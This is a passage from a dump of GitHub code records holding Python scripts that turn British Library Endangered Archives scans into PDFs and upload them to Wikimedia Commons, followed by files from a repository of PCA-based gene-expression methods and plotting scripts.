**eap_download_sel.py**\n- This relies on the **eap_conf.ini** file. All parameters are compulsory.\n- Run *python3 eap_download_sel.py* after completing the configuration file requirements\n- The file uploaded has the {{Book}} template auto-added along with [[Category:PDF-files in Bengali]]\n- License templates have to be specified or later edited manually\n" }, { "alpha_fraction": 0.5, "alphanum_fraction": 0.5085271596908569, "avg_line_length": 36.94117736816406, "blob_id": "fd1c9c1e0710c5842fbabc13ee25a86a16582cc4", "content_id": "e4cf49d3bf3bffe97b3d083991434d7364d6ceb3", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 6450, "license_type": "permissive", "max_line_length": 110, "num_lines": 170, "path": "/eap_download_mass.py", "repo_name": "omshivaprakash/eap2pdf", "src_encoding": "UTF-8", "text": "import multiprocessing\nimport os\nimport re\nimport sys\nimport urllib.request\nfrom urllib.error import HTTPError\nfrom fpdf import FPDF\nimport PyPDF2\nimport time\nimport _helpers\n\n\nclass EAPBookFetch:\n EAP_BASE_URL = 'https://images.eap.bl.uk'\n EAP_ARCHIVE_URL = 'https://eap.bl.uk/archive-file/'\n EAP_LIST_FILENAME = 'eap_files.txt'\n EAP_DONE_FILENAME = 'eap_done.txt'\n EAP_FILENAME = 'default.jpg'\n DEFAULT_HEIGHT = 1200\n DEFAULT_WIDTH = 1200 * 0.8\n JPEG_PATH = 'jpgs'\n PDF_PATH = 'pdfs'\n DELETE_ORIG_PDF = True\n\n @staticmethod\n def join_url(*args):\n joined_url = ''\n for arg in args:\n joined_url = joined_url + arg + '/'\n return joined_url\n\n @staticmethod\n def set_rotate(angle):\n if angle == 90 or angle == 180 or angle == 270:\n return angle\n else:\n return 0\n\n def download_jpg(self, url):\n base_eap = url.split('/')[0]\n eap_url_for_entry = url.replace('/', '_')\n combined_url = self.join_url(self.EAP_BASE_URL, base_eap, eap_url_for_entry)\n pg = 1\n can_go = True\n file_list = []\n if not os.path.exists(self.JPEG_PATH):\n os.makedirs(self.JPEG_PATH)\n while can_go:\n if self.type == 'p':\n dl_url = self.join_url(combined_url, str(pg) + '.jp2', 'full', str(self.height) + ',' +\n str(self.DEFAULT_WIDTH), str(self.rotation),\n self.EAP_FILENAME + '?t=' + str(int(time.time() * 1000)))\n else:\n dl_url = self.join_url(combined_url, str(pg) + '.jp2', 'full', str(self.DEFAULT_WIDTH) + ',' +\n str(self.height), str(self.rotation),\n self.EAP_FILENAME + '?t=' + str(int(time.time() * 1000)))\n print(dl_url)\n title = os.path.join(self.JPEG_PATH, eap_url_for_entry + '_' + str(pg) + '.jpg')\n if os.path.isfile(title):\n # if file exists, don't download iff next file also exists\n # note that this effectively means that we can't parallelize at a page level\n download_this = True\n while True:\n new_title = os.path.join(self.JPEG_PATH, eap_url_for_entry + '_' + str(pg + 1) + '.jpg')\n old_title = os.path.join(self.JPEG_PATH, eap_url_for_entry + '_' + str(pg) + '.jpg')\n if os.path.isfile(new_title):\n print('Skipping ' + old_title)\n file_list.append(old_title)\n pg = pg + 1\n download_this = False\n else:\n break\n if not download_this:\n continue\n pg = pg + 1\n print('Downloading ' + title)\n try:\n urllib.request.urlretrieve(dl_url, title)\n file_list.append(title)\n except HTTPError:\n can_go = False\n\n pdf = FPDF(orientation=self.type, unit='pt', format=(self.height + 50, self.DEFAULT_WIDTH + 50))\n pdf.add_page(orientation=self.type)\n\n for image in file_list:\n print('Adding ' + image + ' to PDF')\n if self.type == 'p':\n pdf.image(image, h=self.DEFAULT_WIDTH, w=self.height)\n else:\n pdf.image(image, h=self.height, w=self.DEFAULT_WIDTH)\n page_count = pdf.page_no()\n if not os.path.exists(self.PDF_PATH):\n os.makedirs(self.PDF_PATH)\n pdf.output(os.path.join(self.PDF_PATH, eap_url_for_entry + '.pdf'))\n\n if page_count > len(file_list):\n # delete pg 1\n infile = PyPDF2.PdfFileReader(os.path.join(self.PDF_PATH, eap_url_for_entry + '.pdf'))\n outfile = PyPDF2.PdfFileWriter()\n pg = 1\n print('Deleting blank page...')\n while pg < page_count:\n p = infile.getPage(pg)\n pg = pg + 1\n outfile.addPage(p)\n exists, eap_file = _helpers.page_exists(self.EAP_ARCHIVE_URL + url.replace('/', '-'))\n if not exists:\n eap_filename = eap_url_for_entry\n else:\n eap_filename = eap_file.title.text.split('|')[0].strip()\n eap_filename = re.sub(r'[^\\w]', '', eap_filename)\n with open(os.path.join(self.PDF_PATH, eap_filename + '.pdf'), 'wb') as f:\n outfile.write(f)\n print('Writing to ' + eap_filename + '.pdf')\n with open(self.EAP_DONE_FILENAME, 'a') as f:\n f.write(url + '\\n')\n if self.DELETE_ORIG_PDF:\n try:\n os.remove(os.path.join(self.PDF_PATH, eap_url_for_entry + '.pdf'))\n except OSError:\n pass\n\n def run(self):\n\n if len(sys.argv) < 2:\n print(\"Limiting number of files downloaded to 50\")\n else:\n try:\n self.dl_count = int(sys.argv[2])\n except ValueError:\n pass\n\n try:\n with open(self.EAP_DONE_FILENAME) as f:\n urls_done = f.read().splitlines()\n except FileNotFoundError:\n urls_done = []\n open(self.EAP_DONE_FILENAME, 'w')\n\n try:\n with open(self.EAP_LIST_FILENAME) as f:\n urls = f.read().splitlines()\n except FileNotFoundError:\n urls = []\n open(self.EAP_LIST_FILENAME, 'w')\n\n urls_not_done = list(set(urls) - set(urls_done))[::-1]\n if not urls_not_done:\n print('No remaining file in list to download')\n return 0\n if len(urls_not_done) >= self.dl_count:\n urls_not_done = urls_not_done[0:self.dl_count]\n\n pool = multiprocessing.Pool(processes=len(urls_not_done))\n pool.map(self.download_jpg, urls_not_done)\n return len(urls_not_done)\n\n def __init__(self):\n self.rotation = 0\n self.height = self.DEFAULT_HEIGHT\n self.type = 'l' # probably broken for landscape\n self.dl_count = 50\n\n\nif __name__ == '__main__':\n start_time = time.time()\n downloaded = EAPBookFetch().run()\n elapsed_time_secs = time.time() - start_time\n print(\"Downloaded \" + str(downloaded) + \" files in \" + str(elapsed_time_secs) + \" seconds\")\n" }, { "alpha_fraction": 0.4646247923374176, "alphanum_fraction": 0.4700734615325928, "avg_line_length": 40.3412971496582, "blob_id": "52a9a460513864d9a2886285fda15b6a9d0022d4", "content_id": "284f2b36fcb440302e83150fd4204e3f7c4d4077", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 12129, "license_type": "permissive", "max_line_length": 135, "num_lines": 293, "path": "/eap_download_sel.py", "repo_name": "omshivaprakash/eap2pdf", "src_encoding": "UTF-8", "text": "import requests\nimport os\nimport re\nimport configparser\nimport urllib.request\nfrom urllib.error import HTTPError\nfrom fpdf import FPDF\nimport PyPDF2\nimport time\nimport _helpers\n\n\nclass EAPBookFetch:\n EAP_BASE_URL = 'https://images.eap.bl.uk'\n EAP_ARCHIVE_URL = 'https://eap.bl.uk/archive-file/'\n EAP_CONFIG_FILENAME = 'eap_conf.ini'\n EAP_FILENAME = 'default.jpg'\n DEFAULT_HEIGHT = 1200\n DEFAULT_WIDTH = 1200 * 0.8\n JPEG_PATH = 'jpgs'\n PDF_PATH = 'pdfs'\n API_BASE_URL = 'https://commons.wikimedia.org/w/api.php'\n CHUNK_SIZE = 1000000\n\n @staticmethod\n def join_url(*args):\n joined_url = ''\n for arg in args:\n joined_url = joined_url + arg + '/'\n return joined_url\n\n @staticmethod\n def set_rotate(angle):\n if angle == 90 or angle == 180 or angle == 270:\n return angle\n else:\n return 0\n\n def download_jpg(self):\n base_eap = self.url.split('/')[0]\n eap_url_for_entry = self.url.replace('/', '_')\n combined_url = self.join_url(self.EAP_BASE_URL, base_eap, eap_url_for_entry)\n pg = 1\n can_go = True\n file_list = []\n if not os.path.exists(self.JPEG_PATH):\n os.makedirs(self.JPEG_PATH)\n while can_go:\n if self.type == 'p':\n dl_url = self.join_url(combined_url, str(pg) + '.jp2', 'full', str(self.height) + ',' +\n str(self.DEFAULT_WIDTH), str(self.rotation),\n self.EAP_FILENAME + '?t=' + str(int(time.time() * 1000)))\n else:\n dl_url = self.join_url(combined_url, str(pg) + '.jp2', 'full', str(self.DEFAULT_WIDTH) + ',' +\n str(self.height), str(self.rotation),\n self.EAP_FILENAME + '?t=' + str(int(time.time() * 1000)))\n\n title = os.path.join(self.JPEG_PATH, eap_url_for_entry + '_' + str(pg) + '.jpg')\n pg = pg + 1\n print('Downloading ' + title)\n try:\n urllib.request.urlretrieve(dl_url, title)\n file_list.append(title)\n except HTTPError as e:\n print(e)\n print(dl_url)\n can_go = False\n\n pdf = FPDF(orientation=self.type, unit='pt', format=(self.height + 50, self.DEFAULT_WIDTH + 50))\n pdf.add_page(orientation=self.type)\n\n for image in file_list:\n print('Adding ' + image + ' to PDF')\n if self.type == 'p':\n pdf.image(image, h=self.DEFAULT_WIDTH, w=self.height)\n else:\n pdf.image(image, h=self.height, w=self.DEFAULT_WIDTH)\n\n page_count = pdf.page_no()\n if not os.path.exists(self.PDF_PATH):\n os.makedirs(self.PDF_PATH)\n pdf.output(os.path.join(self.PDF_PATH, eap_url_for_entry + '.pdf'))\n\n if page_count > len(file_list):\n # delete pg 1\n infile = PyPDF2.PdfFileReader(os.path.join(self.PDF_PATH, eap_url_for_entry + '.pdf'))\n outfile = PyPDF2.PdfFileWriter()\n pg = 1\n print('Deleting blank page...')\n while pg < page_count:\n p = infile.getPage(pg)\n pg = pg + 1\n outfile.addPage(p)\n exists, eap_file = _helpers.page_exists(self.EAP_ARCHIVE_URL + self.url.replace('/', '-'))\n if not exists:\n eap_filename = eap_url_for_entry\n else:\n eap_filename = eap_file.title.text.split('|')[0].strip()\n eap_filename = re.sub(r'[^\\w]', '', eap_filename)\n with open(os.path.join(self.PDF_PATH, eap_filename + '.pdf'), 'wb') as f:\n outfile.write(f)\n print('Writing to ' + eap_filename + '.pdf')\n try:\n os.remove(os.path.join(self.PDF_PATH, eap_url_for_entry + '.pdf'))\n except OSError:\n pass\n return eap_filename\n return ''\n\n def read_config(self):\n config_parser = configparser.ConfigParser()\n config_parser.read(self.EAP_CONFIG_FILENAME, encoding='utf8')\n self.url = config_parser.get('download', 'url')\n if config_parser.has_option('download', 'rotation'):\n try:\n self.rotation = int(config_parser.get('download', 'rotation'))\n except ValueError:\n self.rotation = 0\n if config_parser.has_option('download', 'height'):\n try:\n self.height = int(config_parser.get('download', 'height'))\n except ValueError:\n self.height = 1200\n if config_parser.has_option('download', 'orientation'):\n self.type = config_parser.get('download', 'orientation') # does not work!\n try:\n self.username = config_parser.get('wiki', 'username')\n self.password = config_parser.get('wiki', 'pwd')\n if config_parser.has_option('wiki', 'summary'):\n self.summary = config_parser.get('wiki', 'summary')\n self.title = config_parser.get('wiki', 'title')\n self.filename = config_parser.get('wiki', 'filename')\n self.description = config_parser.get('wiki', 'desc')\n self.author = config_parser.get('wiki', 'author')\n self.license = config_parser.get('wiki', 'license')\n self.date = config_parser.get('wiki', 'date')\n except Exception:\n pass\n\n def get_token(self):\n session = requests.Session()\n login_t = session.get(self.API_BASE_URL, params={\n 'format': 'json',\n 'action': 'query',\n 'meta': 'tokens',\n 'type': 'login',\n })\n login_t.raise_for_status()\n login = session.post(self.API_BASE_URL, data={\n 'format': 'json',\n 'action': 'login',\n 'lgname': self.username,\n 'lgpassword': self.password,\n 'lgtoken': login_t.json()['query']['tokens']['logintoken'],\n })\n if login.json()['login']['result'] != 'Success':\n raise RuntimeError(login.json()['login']['reason'])\n\n # get edit token\n tokens = session.get(self.API_BASE_URL, params={\n 'format': 'json',\n 'action': 'query',\n 'meta': 'tokens',\n })\n return session, tokens.json()['query']['tokens']['csrftoken']\n\n def upload_file(self, session, filename):\n can_go = True\n filename = os.path.join(self.PDF_PATH, filename + '.pdf')\n filekey = ''\n filesize = os.path.getsize(filename)\n print(self.token)\n offset = 0\n i = 1\n page_content = \"=={{int:filedesc}}==\\n\" + \\\n \"{{Book\\n\" + \\\n \"| Author = \" + self.author + \"\\n\" + \\\n \"| Title = \" + self.title + \"\\n\" + \\\n \"| Date = \" + self.date + \"\\n\" + \\\n \"| Language = {{language|bn}}\\n\" + \\\n \"| Wikisource = s:bn:নির্ঘণ্ট:{{PAGENAME}}\\n\" + \\\n \"| Description = \" + self.description + \"\\n\" + \\\n \"| Source = {{Endangered Archives Programme|url=\" + self.EAP_ARCHIVE_URL + self.url.replace('/', '-') + \\\n \"}}{{Institution:British Library}}\\n\" + \\\n \"| Image = {{PAGENAME}}\\n\" + \\\n \"}}\\n\" + \\\n \"=={{int:license-header}}==\\n\" + self.license + \"\\n\" + \\\n \"[[Category:Uploaded with eap2pdf]]\\n\" + \\\n \"[[Category:PDF-files in Bengali]]\"\n with open(filename, 'rb') as f:\n while can_go:\n chunk = f.read(self.CHUNK_SIZE)\n if offset == 0:\n upload = session.post(self.API_BASE_URL, data={\n 'format': 'json',\n 'action': 'upload',\n 'filename': self.filename + '.pdf',\n 'filesize': filesize,\n 'offset': offset,\n 'chunk': chunk,\n 'token': self.token\n }, files={'chunk': chunk,\n 'filename': self.filename + '.pdf'})\n print('Uploaded ' + str(i) + ' MB...')\n i = i + 1\n try:\n filekey = upload.json()['upload']['filekey']\n except (KeyError, NameError):\n print(upload.json())\n raise RuntimeError('Upload failed - try manually!')\n else:\n upload = session.post(self.API_BASE_URL, data={\n 'format': 'json',\n 'action': 'upload',\n 'filename': self.filename + '.pdf',\n 'filesize': filesize,\n 'filekey': filekey,\n 'offset': offset,\n 'chunk': chunk,\n 'token': self.token\n }, files={'chunk': chunk,\n 'filename': self.filename + '.pdf'})\n print('Uploaded ' + str(i) + ' MB...')\n i = i + 1\n try:\n filekey = upload.json()['upload']['filekey']\n except (KeyError, NameError):\n print(upload.json())\n raise RuntimeError('Upload failed - try manually!')\n if upload.json()['upload']['result'] == 'Success':\n done = session.post(self.API_BASE_URL, data={\n 'format': 'json',\n 'action': 'upload',\n 'filename': self.filename + '.pdf',\n 'filekey': filekey,\n 'comment': self.summary,\n 'token': self.token,\n 'text': page_content\n }, files={'filename': self.filename + '.pdf'})\n if 'error' in done.json():\n raise RuntimeError('Could not complete upload. You probably got caught by an abuse filter')\n else:\n print('Done!')\n break\n elif upload.json()['upload']['result'] == 'Continue':\n try:\n offset = upload.json()['upload']['offset']\n except (KeyError, NameError):\n print(upload.json())\n raise RuntimeError('Upload failed - try manually!')\n else:\n print(upload.json())\n raise RuntimeError('Upload failed - try manually!')\n\n def run(self):\n try:\n with open(self.EAP_CONFIG_FILENAME):\n self.read_config()\n except FileNotFoundError:\n print('No configuration file found!')\n return 0\n filename = self.download_jpg()\n try:\n session, self.token = self.get_token()\n self.upload_file(session, filename)\n except (RuntimeError, HTTPError) as e:\n print(e)\n print('Could not upload file. Please verify your credentials.')\n\n return 1\n\n def __init__(self):\n self.rotation = 0\n self.height = self.DEFAULT_HEIGHT\n self.type = 'l' # probably broken for landscape\n self.url = ''\n self.username = ''\n self.password = ''\n self.summary = 'Uploaded via EAP2PDF'\n self.title = ''\n self.description = ''\n self.author = ''\n self.token = ''\n self.date = ''\n self.license = ''\n self.filename = ''\n\n\nif __name__ == '__main__':\n start_time = time.time()\n downloaded = EAPBookFetch().run()\n elapsed_time_secs = time.time() - start_time\n print(\"Uploaded \" + str(downloaded) + \" files in \" + str(elapsed_time_secs) + \" seconds\")\n" } ]
6
ZLX1/RLSDSPCA
https://github.com/ZLX1/RLSDSPCA
32edd84431ed3a90f23d3c225e64ba7b8ce8ad90
ce9914a097c232a48bc463483e12aac8419f0aae
7497e7d908077c8b6c9eb7157462581b58be79c2
refs/heads/main
2023-04-03T08:01:05.398451
2021-04-12T04:44:52
2021-04-12T04:44:52
357,205,786
0
0
null
2021-04-12T13:32:43
2021-04-12T04:44:53
2021-04-12T04:44:52
null
[ { "alpha_fraction": 0.7230320572853088, "alphanum_fraction": 0.7638484239578247, "avg_line_length": 127.625, "blob_id": "3f51a5e5c90c95be05c56a8197c8624f0417cffa", "content_id": "beb43f900b947967a6bd65cfc85d7e44e7af8a9c", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 2070, "license_type": "no_license", "max_line_length": 755, "num_lines": 16, "path": "/README.md", "repo_name": "ZLX1/RLSDSPCA", "src_encoding": "UTF-8", "text": "# RLSDSPCA\n\n## (I) Datasets\nThree different types of gene expression data including Cholangiocarcinoma (CHOL), Head and Neck squamous cell carcinoma (HNSCC), and Pancreatic adenocarcinoma (PAAD) from TCGA. The CHOL dataset includes 45 samples (9 normal samples, 36 cancer samples), 20502 genes; the HNSCC dataset consists of 418 samples (20 normal samples, 398 cancer samples), 20502 genes; the PAAD dataset contains 180 samples, 20502 genes (4 normal samples, 176 cancer samples). The number of genes in the gene expression data of the three different cancer types is same, we integrate the three types of gene expression data in the sample direction to form a multi-source gene expression data that have four categories (normal samples and three different types of cancer samples).\nThe datasets of gene expression for characteristic gene selection and tumor classification were obtained from The Cancer Genome Atlas (TCGA, https://portal.gdc.cancer.gov/) database.\n## (II) Model file\nPCA,gLPCA,gLSPCA,RgLPCA,SDSPCA. The code of the comparision methods and featureselection can be obtained in model file\n## (III) plot file\nThe code of figure plot can be obtained in plot file\n## (IV) methods references\n#### [1] I. Jolliffe, “Principal component analysis,” Technometrics, vol. 45, no. 3, pp. 276, 2003.\n#### [2]C.-M. Feng, Y. Xu, J.-X. Liu, Y.-L. Gao, and C.-H. Zheng, “Supervised discriminative sparse PCA for com-characteristic gene selection and tumor classification on multiview biological data,” IEEE transactions on neural networks and learning systems, vol. 30, no. 10, pp. 2926-2937, 2019.\n#### [3]B. Jiang, C. Ding, and J. Tang, \"Graph-Laplacian PCA: Closed-form solution and robustness.\" pp. 3492-3498.\n#### [4]C.-M. Feng, Y. Xu, M.-X. Hou, L.-Y. Dai, and J.-L. Shang, “PCA via joint graph Laplacian and sparse constraint: Identification of differentially expressed genes and sample clustering on gene expression data,” BMC bioinformatics, vol. 20, no. 22, pp. 1-11, 2019.\n## (V) Contact \nIf you have any suggestions/questions about the work, PLEASE contact with us. E-mail: [email protected]\n" }, { "alpha_fraction": 0.7443056702613831, "alphanum_fraction": 0.7501837015151978, "avg_line_length": 33.8684196472168, "blob_id": "ccd8768895b41350970bf33d9616d9792f2b966c", "content_id": "807d866bc897742c6a0091e4489550723ddd2d15", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1361, "license_type": "no_license", "max_line_length": 105, "num_lines": 38, "path": "/model/FeatureSelection.py", "repo_name": "ZLX1/RLSDSPCA", "src_encoding": "UTF-8", "text": "import numpy as np\r\nimport pandas as pd\r\nimport warnings\r\nimport os\r\nimport time\r\nimport operator\r\nfrom sklearn.model_selection import train_test_split\r\nfrom sklearn.preprocessing import StandardScaler\r\nfrom sklearn.preprocessing import MinMaxScaler\r\nfrom sklearn.neighbors import KNeighborsClassifier\r\nfrom sklearn.neighbors import kneighbors_graph\r\nfrom sklearn.model_selection import GridSearchCV\r\nimport matplotlib.pyplot as plt\r\nfrom mpl_toolkits.mplot3d import Axes3D\r\nimport math\r\nfrom sklearn.preprocessing import normalize\r\nfrom scipy.spatial.distance import pdist, squareform\r\nfrom sklearn.model_selection import KFold\r\nfrom sklearn.metrics import accuracy_score,precision_score,recall_score,f1_score,fbeta_score\r\nfrom sklearn.metrics import roc_auc_score,confusion_matrix,normalized_mutual_info_score,matthews_corrcoef\r\nfrom sklearn.metrics import precision_recall_fscore_support\r\n\r\nwarnings.filterwarnings(\"ignore\")\r\n\r\ndef selectfeature(Y_Feature,Num):\r\n abs_Y_Feature = abs(Y_Feature)\r\n # print('abs_Y_Feature = ',abs_Y_Feature)\r\n ind = np.argsort(-abs_Y_Feature)\r\n Y_Feature_reverse = abs_Y_Feature[np.argsort(-abs_Y_Feature)]\r\n count = 0\r\n for i in range(0,Num):\r\n if Y_Feature_reverse[i] > 0:\r\n count +=1\r\n else:\r\n break\r\n number = count\r\n index = ind[0:count]\r\n return number,index" }, { "alpha_fraction": 0.6645326614379883, "alphanum_fraction": 0.6875800490379333, "avg_line_length": 34.32558059692383, "blob_id": "80fa873ba97b70d30f6ac99435a780d0c9cd08f2", "content_id": "e207bb96c1d6d19bbacd15699464fd7896cd4d79", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1562, "license_type": "no_license", "max_line_length": 73, "num_lines": 43, "path": "/plot/evalu_result_plt.py", "repo_name": "ZLX1/RLSDSPCA", "src_encoding": "UTF-8", "text": "import warnings\r\nwarnings.filterwarnings(\"ignore\")\r\nfrom mpl_toolkits.mplot3d import *\r\nfrom matplotlib import cm\r\n\r\nimport mpl_toolkits.mplot3d as p3d\r\n\r\n\r\nimport numpy as np\r\nimport matplotlib.pyplot as plt\r\nfrom mpl_toolkits.mplot3d import Axes3D\r\nimport pandas as pd\r\nwarnings.filterwarnings(\"ignore\")\r\n\r\nlabels = ['ACC', 'Macro-REC', 'Macro-PRE', 'Macro-F1', 'Macro-AUC']\r\nerKNN_path = 'evaluation_results.csv'\r\nerKNN = pd.read_csv(erKNN_path)\r\nprint(erKNN)\r\nPCA_erKNN = erKNN.iloc[:,1].tolist()\r\ngLPCA_erKNN = erKNN.iloc[:,2].tolist()\r\ngLSPCA_erKNN = erKNN.iloc[:,3].tolist()\r\nRgLPCA_erKNN = erKNN.iloc[:,4].tolist()\r\nSDSPCA_erKNN = erKNN.iloc[:,5].tolist()\r\nRLSDSPCA_erKNN = erKNN.iloc[:,6].tolist()\r\nx = np.arange(len(labels)) # the label locations\r\nwidth = 0.1 # the width of the bars\r\n\r\nplt.rc('font',family='Arial')\r\nfig, ax = plt.subplots()\r\nrects1 = ax.bar(x - width * 5/2, PCA_erKNN, width, label='PCA')\r\nrects2 = ax.bar(x - width * 3/2, gLPCA_erKNN, width, label='gLPCA')\r\nrects3 = ax.bar(x - width/2, gLSPCA_erKNN, width, label='gLSPCA')\r\nrects4 = ax.bar(x + width/2, RgLPCA_erKNN, width, label='RgLPCA')\r\nrects5 = ax.bar(x + width * 3/2, SDSPCA_erKNN, width, label='SDSPCA')\r\nrects6 = ax.bar(x + width * 5/2, RLSDSPCA_erKNN, width, label='RLSDSPCA')\r\n# Add some text for labels, title and custom x-axis tick labels, etc.\r\nax.set_xlabel('The average of five evaluation criteria')\r\nax.set_ylabel('Scores')\r\nax.set_xticks(x)\r\nax.set_xticklabels(labels)\r\nax.legend(loc='upper right',ncol=3,borderaxespad = 0.1)\r\nplt.ylim(0.5,1)\r\nplt.show()\r\n" }, { "alpha_fraction": 0.7523879408836365, "alphanum_fraction": 0.7553269863128662, "avg_line_length": 32.07500076293945, "blob_id": "47c7c9a5781ac3d6a94978f72ca0947ce72e0aa7", "content_id": "0341feb3dea115258729f603abba1807a3aad65e", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1361, "license_type": "no_license", "max_line_length": 105, "num_lines": 40, "path": "/model/PCA.py", "repo_name": "ZLX1/RLSDSPCA", "src_encoding": "UTF-8", "text": "import numpy as np\r\nimport pandas as pd\r\nimport warnings\r\nimport os\r\nimport time\r\nimport operator\r\nfrom sklearn.model_selection import train_test_split\r\nfrom sklearn.preprocessing import StandardScaler\r\nfrom sklearn.preprocessing import MinMaxScaler\r\nfrom sklearn.neighbors import KNeighborsClassifier\r\nfrom sklearn.neighbors import kneighbors_graph\r\nfrom sklearn.model_selection import GridSearchCV\r\nimport matplotlib.pyplot as plt\r\nfrom mpl_toolkits.mplot3d import Axes3D\r\nimport math\r\nfrom sklearn.preprocessing import normalize\r\nfrom scipy.spatial.distance import pdist, squareform\r\nfrom sklearn.model_selection import KFold\r\nfrom sklearn.metrics import accuracy_score,precision_score,recall_score,f1_score,fbeta_score\r\nfrom sklearn.metrics import roc_auc_score,confusion_matrix,normalized_mutual_info_score,matthews_corrcoef\r\nfrom sklearn.metrics import precision_recall_fscore_support\r\nwarnings.filterwarnings(\"ignore\")\r\n\r\n\r\ndef PCA_Algorithm(xMat,k):\r\n Z = -(xMat.T * xMat)\r\n # cal Q\r\n Z_eigVals, Z_eigVects = np.linalg.eig(Z)\r\n eigValIndice = np.argsort(Z_eigVals)\r\n n_eigValIndice = eigValIndice[0:k]\r\n n_Z_eigVect = Z_eigVects[:, n_eigValIndice]\r\n Q = np.array(n_Z_eigVect)\r\n qMat = np.mat(Q)\r\n # cal Y\r\n Y = xMat * qMat\r\n return Y\r\n\r\ndef cal_projections(X_data,k_d):\r\n Y= PCA_Algorithm(X_data.T, k_d)\r\n return Y" }, { "alpha_fraction": 0.6841359734535217, "alphanum_fraction": 0.7152974605560303, "avg_line_length": 24.148147583007812, "blob_id": "39f88bf3dd4969168cd6739138225671ed9d92a4", "content_id": "696f3a2e940ec5d49dd8809e7a0c013d9ca4e294", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 706, "license_type": "no_license", "max_line_length": 43, "num_lines": 27, "path": "/plot/box_plot_REC.py", "repo_name": "ZLX1/RLSDSPCA", "src_encoding": "UTF-8", "text": "import warnings\r\nwarnings.filterwarnings(\"ignore\")\r\nfrom mpl_toolkits.mplot3d import *\r\nfrom matplotlib import cm\r\nimport mpl_toolkits.mplot3d as p3d\r\nimport numpy as np\r\nimport matplotlib.pyplot as plt\r\nfrom mpl_toolkits.mplot3d import Axes3D\r\nimport pandas as pd\r\nimport seaborn as sns\r\nwarnings.filterwarnings(\"ignore\")\r\n\r\nALLpath = 'recall_ALL.csv'\r\nALL = pd.read_csv(ALLpath)\r\nALL_er = ALL.iloc[:,[6,5,4,3,2,1]]\r\nprint(ALL_er)\r\nplt.rc('font', family='Arial')\r\nplt.figure()\r\nsns.set(style=\"whitegrid\")\r\nplot = sns.boxplot(data= ALL_er, width=0.7)\r\nyrange = np.arange(0,1.1,0.05)\r\nplt.yticks(yrange)\r\nplt.ylim(0.3,1)\r\nplt.xlabel('Methods')\r\nplt.ylabel('Macro-REC')\r\nfig = plot.get_figure()\r\nplt.show()\r\n" }, { "alpha_fraction": 0.5564558506011963, "alphanum_fraction": 0.5697856545448303, "avg_line_length": 29.636363983154297, "blob_id": "e246310d391d5db7b0dc6b4b09ca684b37fe2d82", "content_id": "36d75afa48ed6dac7579e8a43722455b7e5ee85f", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 3826, "license_type": "no_license", "max_line_length": 110, "num_lines": 121, "path": "/model/RgLPCA.py", "repo_name": "ZLX1/RLSDSPCA", "src_encoding": "UTF-8", "text": "import numpy as np\r\nimport pandas as pd\r\nimport warnings\r\nimport os\r\nimport time\r\nimport operator\r\nfrom sklearn.model_selection import train_test_split\r\nfrom sklearn.preprocessing import StandardScaler\r\nfrom sklearn.preprocessing import MinMaxScaler\r\nfrom sklearn.neighbors import KNeighborsClassifier\r\nfrom sklearn.neighbors import kneighbors_graph\r\nfrom sklearn.model_selection import GridSearchCV\r\nimport matplotlib.pyplot as plt\r\nfrom mpl_toolkits.mplot3d import Axes3D\r\nimport math\r\nfrom sklearn.preprocessing import normalize\r\nfrom scipy.spatial.distance import pdist, squareform\r\nfrom sklearn.model_selection import KFold\r\nfrom sklearn.metrics import accuracy_score,precision_score,recall_score,f1_score,fbeta_score\r\nfrom sklearn.metrics import roc_auc_score,confusion_matrix,normalized_mutual_info_score,matthews_corrcoef\r\nfrom sklearn.metrics import precision_recall_fscore_support\r\n\r\nwarnings.filterwarnings(\"ignore\")\r\n\r\n\r\ndef rbf(dist, t):\r\n '''\r\n rbf kernel function\r\n '''\r\n return np.exp(-(dist / t))\r\n\r\ndef Eu_dis(x):\r\n \"\"\"\r\n Calculate the distance among each raw of x\r\n :param x: N X D\r\n N: the object number\r\n D: Dimension of the feature\r\n :return: N X N distance matrix\r\n \"\"\"\r\n x = np.mat(x)\r\n aa = np.sum(np.multiply(x, x), 1)\r\n ab = x * x.T\r\n dist_mat = aa + aa.T - 2 * ab\r\n dist_mat[dist_mat < 0] = 0\r\n dist_mat = np.sqrt(dist_mat)\r\n dist_mat = np.maximum(dist_mat, dist_mat.T)\r\n return dist_mat\r\n\r\ndef cal_rbf_dist(data, n_neighbors, t):\r\n dist = Eu_dis(data)\r\n n = dist.shape[0]\r\n # rbf_dist = rbf(dist, t)\r\n W_L = np.zeros((n, n))\r\n for i in range(n):\r\n index_L = np.argsort(dist[i, :])[1:1 + n_neighbors]\r\n len_index_L = len(index_L)\r\n for j in range(len_index_L):\r\n # W_L[i, index_L[j]] = rbf_dist[i, index_L[j]]\r\n W_L[i, index_L[j]] = 1\r\n # W_L = np.multiply(W_L, (W_L > W_L.transpose())) + np.multiply(W_L.transpose(), (W_L.transpose() >= W_L))\r\n W_L = np.maximum(W_L, W_L.transpose())\r\n return W_L\r\n\r\ndef cal_laplace(data):\r\n N = data.shape[0]\r\n H = np.zeros_like(data)\r\n for i in range(N):\r\n H[i, i] = np.sum(data[i])\r\n L = H - data # Laplacian\r\n return L\r\n\r\ndef RgLPCA_Algorithm(xMat,laplace,gamma,k):\r\n obj1 = 0\r\n obj2 = 0\r\n thresh = 1e-50\r\n E = np.ones((xMat.shape[0],xMat.shape[1]))\r\n E = np.mat(E)\r\n C = np.ones((xMat.shape[0],xMat.shape[1]))\r\n C = np.mat(C)\r\n laplace = np.mat(laplace)\r\n miu = 1\r\n for m in range(0, 10):\r\n Z = (-(miu/2) * ((E - xMat + C/miu).T * (E - xMat + C/miu))) + gamma * laplace\r\n # cal Q\r\n Z_eigVals, Z_eigVects = np.linalg.eig(np.mat(Z))\r\n eigValIndice = np.argsort(Z_eigVals)\r\n n_eigValIndice = eigValIndice[0:k]\r\n n_Z_eigVect = Z_eigVects[:, n_eigValIndice]\r\n Q = np.array(n_Z_eigVect)\r\n qMat = np.mat(Q)\r\n # cal Y\r\n Y = (xMat - E - C/miu) * qMat\r\n # cal A\r\n A = 